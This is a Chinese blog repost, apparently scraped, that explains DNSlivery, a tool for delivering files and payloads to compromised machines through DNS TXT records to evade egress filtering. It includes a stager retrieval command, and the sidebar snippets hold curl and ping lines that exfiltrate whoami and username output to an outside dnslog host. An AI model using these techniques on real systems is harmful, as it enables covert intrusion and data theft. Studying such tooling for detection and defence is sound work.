存储dns服务器的文件是,DNSlivery:通过DNS发送文件和payload的工具

最新推荐文章于 2022-10-30 09:54:15 发布
最新推荐文章于 2022-10-30 09:54:15 发布
阅读量296 收藏
点赞数
文章标签: 存储dns服务器的文件是

前言

DNSlivery是一款使用DNS作为传输协议将文件传递到目标的工具。

特点1.执行或上传文件到目标机器

2.目标上的不需要任何客户端

3.不需要完整的DNS服务器

6596654fc8ecb464c50e1f1a1cbb5318.gif

它可以轻松地将文件或payload传送到受损目标,不需要使用传统的Web传输,无需专用客户端软件。这适用于禁止传出Web流量的受限环境。

652b6f8fde7ddbe2a0695c2f4df92255.png

虽然现在已经存在更完整的DNS隧道工具(比如 dnscat2和iodine),它们都需要在目标上运行专用客户端。问题是DNS可能没有其他办法在这种受限制的环境中提供客户端。换句话说,使用这些工具构建DNS通信通道需要已具有DNS通信通道。

相比之下,DNSlivery仅提供从服务器到目标的单向通信,但不需要任何专用客户端来执行此操作。因此,如果您需要通过DNS构建可靠的双向通信通道,请使用DNSlivery为您的目标提供更高级的DNS隧道工具的客户端。

它是如何工作的?

与大多数DNS隧道工具一样,DNSlivery使用TXT记录以base64表示形式存储文件内容。但是,它不需要设置完整的DNS服务器。相反,它使用scapy库来侦听传入的DNS数据包并制作所需的响应。

848a6c52a7d7b80d6c26dec7f441a20d.png

由于大多数文件不适合单个TXT记录,DNSlivery将创建包含该文件的base64块的多个有序记录,上面的图示出了输送第二命名的文件的块file。

为了检索所有base64块并将它们重新组合在一起而不需要在目标上使用专用客户端,DNSlivery将为每个文件生成:1.一个明文发送器

2.一个base64编码stager

97fb786fa678c1c51697aaa587591d94.png

需要这两个阶段的交付过程来向stager添加功能(处理丢失的DNS响应),否则这些功能将不适合单个TXT记录。

关于目标兼容性的注意

目前,仅支持PowerShell目标。但是,可以改进DNSlivery以支持其他目标,例如bash或python。如果这是您希望实现的功能,请告诉我@ no0be。

要求

DNSlivery不需要构建复杂的服务器基础结构。实际上,只有两个简单的要求:1.能够NS在您的公共DNS区域中创建记录

2.拥有一台能够从Internet 接收流量的Linux服务器,开放udp/53

DNS

第一步是通过NS在域中创建新记录,将子域委派给将运行DNSlivery的服务器。作为示例,我创建了以下记录以将子域委托dnsd.no0.be给服务器vps.no0.be。

如果您的区域由第三方提供商管理,请参阅其文档以创建NS记录。

DNSlivery

运行DNSlivery的唯一要求是python3它的scapy库。

用法

服务器

DNSlivery将为给定目录的所有文件提供服务(pwd默认情况下),并且需要以root权限运行s以侦听传入的udp/53数据包。

示例:

关于文件名规范化的注意

由于允许域名的字符集比UNIX文件名更具限制性(根据RFC1035),DNSlivery将在需要时执行规范化。

示例:

请注意,当前的规范化代码并不完美,因为它不会考虑重叠的文件名或大小限制。

目标

在目标上,首先通过请求其专用记录来检索所需文件的启动器TXT。支持以下三个启动器:

3d0fc913944d0a91f17f24338caacd3d.pngnslookup -type = txt [filename].[stager].[domain]

然后,只需将DNS响应中引用的启动器复制并粘贴到PowerShell控制台即可检索目标上的文件。

示例:

9c725a9d209e3bb055e6bda66f8194aa.gif

转载于:https://www.heibai.org/post/1535.html

weixin_39753211
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
如何使用DNSStager在DNS中隐藏Payload
MSB_WLAQ的博客
09-29 348
关于DNSStager DNSStager是一个基于Python开发的开源项目,可以帮助广大研究人员使用DNS来隐藏和传输PayloadDNSStager可以创建一个恶意DNS服务器,并负责处理我们域名相关的DNS请求,然后将Payload隐藏在响应中的指定记录请求中,比如说“AAAA”记录或“TXT”记录,而且DNSStager还会使用各种不同的算法来对Payload进行编码。 DNSStager能够生成基于C或Golang的自定义代理,主要负责解析一系列域名、获取Payload...
Python-DNSlivery允许使用DNS作为传输协议将文件传递到目标
08-10
DNSlivery - 允许使用DNS作为传输协议将文件传递到目标
存储dns服务器文件是,DNS服务器详解.doc
weixin_42508114的博客
07-31 601
文档介绍:DNS 服务器详解 DNS 服务 DNS 概述当网络上的计算机使用主机名沟通时, 该主机名必须被转化为 IP地址, 主机名转化为 IP 地址的过称成为“主机名称解析”。主要的名称解析方式 1.WINS 服务: BIOS 名解析 2.DNS 服务: 一般用于 FQDN( 完全合格域名) 解析 DNS: 域名系统,DNS 客户机向 DNS 服务器发出名称解析请求,DNS 服务器查询其 DNS...
服务器 txt文件_DNSlivery:利用DNS协议投递文件Payload
weixin_39805195的博客
11-28 208
DNSlivery项目允许通过DNS协议将文件Payload投递到目标上。该项目最初的灵感来自于PowerDNS和Joff Thyer发布在Paul每周安全播客#590的技术片段。特性允许打印,执行或保存文件到目标不需要目标上的任何客户端不需要完整的DNS服务器DNSlivery可以轻松地将文件/payload传送到目标机器,且不需要目标上安装运行任何专用的客户端软件,这是web deliver...
DNSLOG的Payload
weixin_30735745的博客
06-07 388
命令执行处 linux curl http://ip.port.b182oj.ceye.io/`whoami` ping `whoami`.ip.port.b182oj.ceye.io windows ping %USERNAME%.b182oj.ceye.io 1.//变量 类型 描述 2.//%ALLUS...
详解python上传文件和字符到PHP服务器
09-21
在这个例子中,`files`是一个字典,其中`"img"`是服务器端处理文件时使用的键,`open("test.png", "rb")`则是打开并读取文件的内容,以二进制模式("rb")进行。`data`字典仍然可以携带额外的非文件数据。 对于更...
通过随机异或和加密payload动态免杀所有php文件
最新发布
03-12
标题中的“通过随机异或和加密payload动态免杀所有php文件”揭示了本文将探讨如何利用随机异或操作和加密技术来实现PHP代码的安全保护,防止恶意攻击者对PHP文件进行逆向工程分析或者篡改。这个话题涉及到网络安全、...
payload-maven-plugin:将有效载荷文件部署到存储
05-22
一个插件,用于收集MavenReact堆项目的总有效负载清单,包括依赖项,插件和报告工件。 输出可用于创建增量Maven副本。 用法: mvn com.rebaze.maven:payload-maven-plugin:deploy 有效载荷文件假定为生成的target...
purescript-payload:用于PureScript的HTTP服务器和客户端库
05-18
Payload是受和启发的PureScript的HTTP服务器和客户端库。 基本思想:编写一个API规范。 将处理程序编写为返回数据的函数。 免费获取: 请求路由 将URL参数,查询参数和请求正文解码为类型化的值 将类型化的值编码...
dns服务器存储什么信息,什么是DNS服务器
weixin_36104484的博客
08-04 1724
DNS是进行域名和与之相对应的IP地址转换的服务器,DNS中保存了一张域名和与之相对应的IP地址的表,以解析消息的域名。本文操作环境:Windows7系统、Dell G3电脑。DNS(域名系统)是支持互联网的重要技术。没有这个,你就不能使用网站或邮件。首先,一般我们使用的通常字母域名,访问Web和服务器设备的电子邮件(IP地址),DNS负责存储服务并提供转换它们的信息,DNS服务器是写入的地址(域...
基于dnsliveryDNS隧道研究
ailx10
05-19 194
找了一圈,现网里面竟然没有一个dnsliverydns隧道实践操作,都是翻译github上的README.md,又是第一个吃螃蟹的人了。dnslivery可以说是一个文件投递神器,只要准备好一个dns请求脚本,然后丢给僵尸主机跑一下,就会得到一个下载命令,僵尸主机执行这个命令,文件就传递到僵尸主机的电脑上了。实践表明,这个文件传递是真的很局限,19k的小文件切割了100份,传了1分钟。因此,我认...
Android DNS 存储文件,Android网络DNS
weixin_33292780的博客
05-27 787
1 Android netd DNSlibcore/ojluni/src/main/java/java/net/InetAddress.javanetd中dns server设置文件:ResolverController.cppnetd中域名解析文件DnsProxyListener.cppFigure 1-1 Android netd DNS 2 libc DNS解析函数bionic/libc/...
linux 7 dns配置文件,Linux CentOS7 DNS服务器配置
weixin_39698255的博客
04-29 143
一:安装DNSyum install bind #安装DNSyum install bind-utils #安装nslookup二:修改主配置文件,添加正反向域vim/etc/named.conf    #编辑主配置文件listen-on port 53 { any; }  #修改为anyallow-query { any; }    #修改为any#主...
CentOS7配置DNS服务器
forinput的博客
06-29 495
DNS(英文:Domain Name System,域名解析系统)可以实现域名与IP双向解析,通过域名解析出IP地址的叫做正向解析,通过IP地址解析出域名的叫做反向解析,默认端口号53。 1.安装DNS相关包服务器 yum -y install bind bind-utils //安装DNS服务器 2.配置主要文件 vim /etc/named.conf 将127.0.0.1修改成any,代表允许监听任何IP地址 将localhost修改成any,代表允许任何主机查...
CentOS7 DNS服务配置
AndLinux
10-30 375
【代码】CentOS7 DNS服务配置。
DNS简述及配置
weixin_33967071的博客
08-06 297
【概念】DNS(Domain Name System),即域名系统,是互联网上为主机提供分配一个便于记忆的名称系统。【需求】计算机发展之初,仅仅是用IP进行主机的网络间通信,但单纯的记忆IP,这对人类的认知造成很大程度的困惑。所以为了解决这种情况,最早就出现了本机的localhost文件将IP和名称绑定。但随着网络的发展,接入的终端越来越多,本地的localhost文件已经无...
基于dnsexfiltrator的DNS隧道研究
ailx10
05-20 270
dnsexfiltrator 主要利用子域名编码来泄漏数据,dnsexfiltrator 基于DNS协议TXT记录,从僵尸主机传输文件到C2服务器的一种工具,而dnslivery 是一种基于DNS协议TXT记录,将C2服务器中的文件传输到僵尸主机的一种工具,二者传输文件方向更好相反。dnsexfiltrator 传递 1.03M的文件,需要6460个包,那么一个包传递167.23个字节,由于bas...
DNS隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 2579
DNS tunnel的利用
通过DNS发送文件payload工具DNSlivery
www_45zq_cn的博客
09-20 565
DNSlivery是一款使用DNS作为传输协议将文件传递到目标的工具。 特点 1.执行或上传文件到目标机器 2.目标上的不需要任何客户端 3.不需要完整的DNS服务器 它可以轻松地将文件payload传送到受损目标,不需要使用传统的Web传输,无需专用客户端软件。这适用于禁止传出Web流量的受限环境。 虽然现在已经存在更完整的DNS隧道工具(比如 dnscat2和iodine),它们都需要在目标...
Redfish 和 OData 白皮书:基于 schema 文件和 OData 服务文档的实现指南
文件提供了关于服务器的硬件和软件资源的信息,用于指导Redfish Client和Server的通信。该白皮书详细介绍了Metadata Document的格式和结构,以及如何使用它们来描述服务器的配置和状态信息。 六、附录 该白皮书的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值